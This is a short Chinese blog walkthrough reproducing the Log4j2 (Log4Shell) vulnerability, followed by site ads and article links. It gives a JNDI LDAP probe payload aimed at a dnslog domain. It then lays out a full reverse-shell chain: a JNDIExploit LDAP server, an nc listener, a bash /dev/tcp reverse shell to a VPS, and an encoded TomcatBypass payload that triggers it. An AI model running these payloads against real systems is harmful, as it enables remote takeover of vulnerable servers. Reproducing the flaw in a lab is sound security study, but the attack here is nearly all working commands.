Log4j2漏洞复现
二、漏洞复现
2.1 使用DNLOG平台查看回显
可以使用相关的dnslog平台查看,也可以使用burp自带的dnslog进行查看,我这里使用的是 http://dnslog.cn/
${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显,说明存在该漏洞
2.2 反弹shell
1、首先起一个ldap服务,IP为接收shell的地址。
1 | java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 139.198.xx.xx |
2、在VPS上开启NC监听
nc -lvvp 1000
3、使用bash命令反弹shell
1 | bash -i >& /dev/tcp/139.198.xx.xx/1000 0>&1 //,这里需要先base64编码,然后再进行两次url编码。 |
${jndi:ldap://VPSIP:1389/TomcatBypass/Command/Base64/YmFzaCAtaSsfqwA%252BJiAvzkuMTk4LjEyNS45OSgas85OTk5IDA%252BJjE%253D}
成功反弹shell到我们的VPS上
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!